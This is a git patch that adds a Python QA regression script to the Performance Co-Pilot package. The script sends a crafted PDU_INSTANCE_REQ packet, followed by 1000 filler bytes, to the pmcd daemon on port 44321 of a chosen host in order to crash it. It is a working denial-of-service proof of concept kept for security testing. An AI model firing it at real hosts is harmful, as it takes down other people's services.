From 47e6e7c84f008a53061e661f31ae96629bc694ef Mon Sep 17 00:00:00 2001
From: Igor Pashev <pashev.igor@gmail.com>
Date: Sun, 26 Oct 2014 12:33:50 +0400
Subject: Debian 3.9.10

---
 qa/secure/crash-instancereq | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100755 qa/secure/crash-instancereq

(limited to 'qa/secure/crash-instancereq')

diff --git a/qa/secure/crash-instancereq b/qa/secure/crash-instancereq
new file mode 100755
index 0000000..b9ea390
--- /dev/null
+++ b/qa/secure/crash-instancereq
@@ -0,0 +1,18 @@
+#
+# usage: python crash-instancereq HOST
+#
+# Connects to pmcd on HOST and sends a crafted PDU_INSTANCE_REQ
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+_, host = sys.argv
+#sock = socket.create_connection((host, 44321))
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+sock.send(str("\x00\x00\x00\x14\x00\x00p\x0c\x00\x00\x00\x01\x00\x00\x00\x01\x01\x02\x00\x00")
+          + str('\x00\x00\x04\x08\x00\x00p\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff')
+          + str('X') * 1000)
+
+sock.close()
-- 
cgit v1.2.3